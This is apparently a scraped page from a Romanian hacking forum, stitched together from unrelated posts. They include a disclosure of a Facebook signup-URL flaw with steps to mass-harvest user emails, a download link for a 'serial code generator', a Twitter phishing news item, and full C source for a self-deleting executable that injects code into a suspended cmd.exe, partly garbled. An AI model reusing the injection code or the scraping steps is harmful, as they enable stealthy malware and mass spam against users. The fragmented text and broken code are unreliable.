Leaderboard

When you sign up on Facebook, you have to enter an email address and that email address becomes your primary email address on Facebook. In a recent disclosure by a Security researcher, Stephen Sclafani - The Social Networking site Facebook was vulnerable to disclosure of primary email address of any Facebook user to hackers and spammers. The flaw resides in the invitation mechanism of Facebook, using which one can invite his all contacts emails to Facebook for making new account. As shown in following screenshot, an invitation received on an email, where one need to click the Signup URL: After clicking that URL, invited user will be redirected to a signup page filled in with the email address and the name of a person who used the link to sign up for an account was displayed: There are two parameters in this URL, i.e “re” and “mid”. According to Stephen changing some part of "mid" parameter can expose the email address of another user. http://www.facebook.com/r.php?re=245bf2da75118af20d917bdd34babddb&mid=59b63aG5af3107aba69G0G46 59b63a G 5af3107aba69 G 0 G 46 He explained that, in above string, “G“ acting as a delimiter/separator, where 2nd value after first “G“ i.e 5af3107aba69 is the Profile ID of user. Replacing user ID can give expose email ID of any user in Sign Up Page. Attacker can obtain this numerical ID of facebook profile from Graph API. Using this flaw attacker can extract email address of all facebook profiles for spamming or hacking purpose. Attacker need to just write an automated script/code to grab all email address of billions of facebook users. Using following steps hacker can write a automated code to grab all emails: 1.) Grab profile links of all facebook users from Facebook People Directory i.e A A | azusa sakata | Director de persoane | Facebook 2.) Collect Numerical Facebook ID for each Profile from facebook Graph API i.e The Hacker News 3.) In Next step, using curl or other methods open the modified URL for each profile ie http://www.facebook.com/r.php?re=245bf2da75118af20d917bdd34babddb&mid=59b63aG1251386282G0G46 4.) Filter the email address exposed in the Source code obtained from above step for each profile and store in database. This way, above vulnerability was able to put every facebook user at Risk, but Stephen's responsible disclosure to Facebook Security team save us. He is rewarded with $3,500 for helping them to patch this flaw. Vulnerability in Facebook discloses Primary Email Address of any account - TheHackerNews

Program de generat coduri Seriale Online Merge foarte bine https://www.youtube.com/watch?v=CNyeHlPBko0 Download: https://docs.google.com/file/d/0B4BhpTKoOhz7ZmZHblFiVWItUkU/edit?pli=1 Scan pe anubis

Sa ne chemi si pe noi cand va scoateti buletinele. Dam noi de baut. Strangem bani pana atunci. report //penibil! Respectati-va putin!

A nasty new phishing campaign that aims to harvest Twitter login credentials is doing the rounds. The scam typically appears in the shape of direct messages to prospective marks from one of their contacts. Attackers are using messages such as "This person is threatening to expose something bad about you" with a link. The link takes prospective victims (who may be concerned they are about to be slandered or worse) to a dodgy site (twitller.com), which poses as a login to Twitter. Victims are encouraged to hand over their login credentials which are then used to take over compromised accounts and send more intimidating messages. "This is a nasty trick especially when the sender is someone you know and trust. If you receive a suspicious DM or email from a person you know and trust, just warn him/her – the account is most likely hijacked and controlled by the attackers," security blogger Janne Ahlberg warns. A quick Twitter search on a key phrase suggests that the scam might have flared up around Thursday and run into the weekend. No more than a handful of people reported seeing it, so we appear to be talking about a low level or unsuccessful scam. Any typo-squatting site associated with the attack is likely to get squashed but this won't stop the ruse re-appearing under a slightly different guise or featuring a different site. Let's be careful out there. The motives, much less the perpetrators of the Twitter phishing campaign, are unknown. Possible motivations might be the use of compromised accounts to send messages advertising dodgy diet sites (earning marketing affiliate revenue in the process), or the use of compromised Twitter account login credentials to break into other services (email, Facebook etc). This latter trick is only possible thanks to the widespread but hopelessly insecure practice of using the same password on multiple websites. ® Sursa TheRegister.co.uk

[h=1]Self-deleting executable[/h]by [h=3]zwclose7[/h]This is another example of PE injection. This program will create a suspended cmd.exe process, and then inject the executable image into to the child process. An user mode APC is then queued to the child process's primary thread. Finally, the thread is resumed and the injected code is executed. The injected code calls DeleteFile function to delete the original executable file. 1) Get the PE header of the program using RtlImageNtHeader. 2) Create a suspended cmd.exe using CreateProcess function. 3) Allocate executable memory in the child process. 4) Relocate the executable image, and then write it to the child process using NtWriteVirtualMemory function. 5) Queue an user mode APC to the child process's primary thread. 6) Resume the primary thread using NtResumeThread function. 7) The primary thread executes the injected code. 8) The injected code calls DeleteFile function to delete the original executable file. 9) The injected code calls ExitProcess function to terminate the cmd.exe process. #include <Windows.h>#include <winternl.h> #pragma comment(lib,"ntdll.lib") EXTERN_C PIMAGE_NT_HEADERS NTAPI RtlImageNtHeader(PVOID); EXTERN_C NTSTATUS NTAPI NtWriteVirtualMemory(HANDLE,PVOID,PVOID,ULONG,PULONG); EXTERN_C NTSTATUS NTAPI NtResumeThread(HANDLE,PULONG); EXTERN_C NTSTATUS NTAPI NtTerminateProcess(HANDLE,NTSTATUS); char szFileName[260]; void WINAPI ThreadProc() { while(1) { Sleep(1000); if(DeleteFile(szFileName)) { break; } } ExitProcess(0); } int WINAPI WinMain(HINSTANCE hInst,HINSTANCE hPrev,LPSTR lpCmdLine,int nCmdShow) { PIMAGE_NT_HEADERS pINH; PIMAGE_DATA_DIRECTORY pIDD; PIMAGE_BASE_RELOCATION pIBR; HMODULE hModule; PVOID image,mem,StartAddress; DWORD i,count,nSizeOfImage; DWORD_PTR delta,OldDelta; LPWORD list; PDWORD_PTR p; STARTUPINFO si; PROCESS_INFORMATION pi; GetModuleFileName(NULL,szFileName,260); hModule=GetModuleHandle(NULL); pINH=RtlImageNtHeader(hModule); nSizeOfImage=pINH->OptionalHeader.SizeOfImage; memset(&si,0,sizeof(si)); memset(?,0,sizeof(pi)); if(!CreateProcess(NULL,"cmd.exe",NULL,NULL,FALSE,CREATE_SUSPENDED|CREATE_NO_WINDOW,NULL,NULL,&si,?)) { return 1; } mem=VirtualAllocEx(pi.hProcess,NULL,nSizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); if(mem==NULL) { NtTerminateProcess(pi.hProcess,0); return 1; } image=VirtualAlloc(NULL,nSizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); memcpy(image,hModule,nSizeOfImage); pIDD=&pINH->OptionalHeader.DataDirectory[iMAGE_DIRECTORY_ENTRY_BASERELOC]; pIBR=(PIMAGE_BASE_RELOCATION)((LPBYTE)image+pIDD->VirtualAddress); delta=(DWORD_PTR)((LPBYTE)mem-pINH->OptionalHeader.ImageBase); OldDelta=(DWORD_PTR)((LPBYTE)hModule-pINH->OptionalHeader.ImageBase); while(pIBR->VirtualAddress!=0) { if(pIBR->SizeOfBlock>=sizeof(IMAGE_BASE_RELOCATION)) { count=(pIBR->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/sizeof(WORD); list=(LPWORD)((LPBYTE)pIBR+sizeof(IMAGE_BASE_RELOCATION)); for(i=0;i<count;i++) { if(list>0) { p=(PDWORD_PTR)((LPBYTE)image+(pIBR->VirtualAddress+(0x0fff & (list)))); *p-=OldDelta; *p+=delta; } } } pIBR=(PIMAGE_BASE_RELOCATION)((LPBYTE)pIBR+pIBR->SizeOfBlock); } if(!NT_SUCCESS(NtWriteVirtualMemory(pi.hProcess,mem,image,nSizeOfImage,NULL))) { NtTerminateProcess(pi.hProcess,0); return 1; } StartAddress=(PVOID)((LPBYTE)mem+(DWORD_PTR)(LPBYTE)ThreadProc-(LPBYTE)hModule); if(!QueueUserAPC((PAPCFUNC)StartAddress,pi.hThread,0)) { NtTerminateProcess(pi.hProcess,0); return 1; } NtResumeThread(pi.hThread,NULL); NtClose(pi.hThread); NtClose(pi.hProcess); VirtualFree(image,0,MEM_RELEASE); return 0; } [h=4]Attached Files[/h] selfdel.zip 272.35K 6 downloads Sursa: Self-deleting executable - rohitab.com - Forums

Datele pot fi pastrate in cristale care pot rezista la temperaturi de 1.000 grade celsius. Cercetatorii au demonstrat capacitatea de a citi si scrie date utilizand un proces de inregistrare cinci-dimensional intr-un cristal sintetic, pentru a stoca cantitati masive de date pe durata nelimitata. Cercetatorii, condusi de catre Jingyu Zhang, din cadrul Universitatii din Southampton, Marea Britanie, au inregistrat cu succes o copie digitala de 300KB a unui fisier text pe o sticla nanostructurata in 5D, utilizand laser ultrarapid si intense pulse. Fisierul a fost scris in trei straturi de puncte nanostructurate, separate de cinci micrometri (cinci milionimi de metru). Oamenii de stiinta au utilizat un laser femtosecunda, care emite pulsuri de lumina in femtosecunde (o milionime dintr-o miliardime de secunda). Laserul 5D scriere/citire poate inregistra pana la valoarea estimata de 360TB/disc pe sticla nanostructurata, care are o stabilitate termica de pana la 1000 grade celsius si, practic, o durata de viata nelimitata. Intr-o declaratie data saptamana trecuta, cercetatorii au denumit sticla "cristalul de memorie Superman", facand aluzie la "cristalele de memorie" utilizate in filmele Superman pentru a stoca cunostintele colective cu privire la istoria si civilizatia planetei Kryptonite. Cercetatorii Universitatii din Southampton au inregistrat prin nanostructuri auto-asamblate, create in cuart topit, despre care acestia au afirmat ca au capacitatea de a stoca cantitati imense de date, pentru mai mult de un milion de ani. Codificarea informatiilor vine in cinci dimensiuni, care includ dimensiunea si orientarea in plus fata de cele trei pozitii dimensionale ale acestor nanostructuri. Potrivit unei lucrari publicate recent, nanostructurile auto-asamblate schimba modul in care lumina trece prin sticla, modificand polarizarea luminii, care poate fi citita, apoi, prin combinarea unui microscop optic si a unui polarizator, similar celor care se regasesc in ochelarii de soare Polaroid. Studiul a fost realizat ca parte a unui proiect comun cu Universitatea de Tehnologie Eindhoven. "Suntem in curs de dezvoltare a unei forme de memorie portabila foarte stabila si sigura, utilizand sticla, care ar putea fi extrem de utila pentru organizatiile cu arhive mari", a declarat Jingyu. "In acest moment, companiile trebuie sa isi asigure arhivele la fiecare cinci pana la zece ani, deoarece memoria hard-drive are o durata de viata relativ scurta". Sursa: Computerworld - IT news, features, blogs, tech reviews, career advice

dau 2$ wmz sa il raportez.

Hi guys Used someone=Easypaycheckformula 2= ?! is scam or make money...and if yes...where we find free ?! Peace and Love !!! ><

Frate...tu te rogi sa fi mantuit si ai la semnatura marijuana...altii beau ..injura ...sexul a ajuns placerea strazii..tu crezi ca doar trebuie sa te rogi si gata esti mantuit?Prietene inainte de asta trebuie sa renunti la ele,sa te schimbi ,sa-l cauti pe Dumnezeu cu toata inima ta ..sa simti...prietene nu stiu doar informatica si mate ..iti predau ce vrei tu ,daca vrei!

vivoi.semesoi.spam.